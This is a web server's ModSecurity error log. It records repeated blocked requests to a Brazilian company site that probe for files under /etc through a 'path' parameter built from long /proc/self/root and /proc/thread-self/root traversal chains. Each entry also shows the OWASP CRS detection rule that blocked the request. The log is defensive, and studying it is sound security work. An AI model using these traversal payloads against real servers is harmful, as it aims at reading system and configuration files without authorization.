[Mon Mar 16 19:33:51.368575 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:46298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFT7ABkC4fWIHEf8EgAAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:52.747457 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.241.46:46310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFUKQpVkWug9HeOt9ZPAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:55.082799 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:46324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFUlajLEzk2WiQ-105ZgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:56.475772 2026] [:error] [pid 29802:tid 140411590858496] [client 74.7.241.46:46340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFVM_BxrYCr4hPDw8R-QAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:58.048954 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:46356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFVbysWC90G-1nBrBrtgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:59.353500 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:45794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFV6TCbgAP5jq5TehRAwAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:01.409472 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:45804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFWNSswJuvopo3lOiHuQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:02.734958 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:45806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFWqTCbgAP5jq5TehRCgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:03.900657 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:45808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFW6TCbgAP5jq5TehRDQAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:05.181356 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:45816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFXVajLEzk2WiQ-105ZwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:09.521831 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:45820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFYdSswJuvopo3lOiHvgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:12.959589 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:57246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFZLABkC4fWIHEf8EgEgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:34:14.211208 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:37948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFZrysWC90G-1nBrBrwQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:34:40.975477 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:37954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFgP9ocpUE4ed4uDwZywAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:34:57.176271 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:54972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFkbABkC4fWIHEf8EgJgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:35:12.931467 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.244.31:38380] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiFoFajLEzk2WiQ-105eQAAApM"]
[Mon Mar 16 19:35:13.437497 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:39154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFodSswJuvopo3lOiH2AAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:35:21.455548 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:46158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFqf9ocpUE4ed4uDwZ2QAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:35:23.805479 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:58760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFq7ABkC4fWIHEf8EgLgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:35:25.117943 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:58776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFrY6lpbStxTqkSkuOTgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:36:14.750927 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:58786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiF3v9ocpUE4ed4uDwaEAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:36:44.966523 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:35602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiF_Er9dMAiw-8KANNvVwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
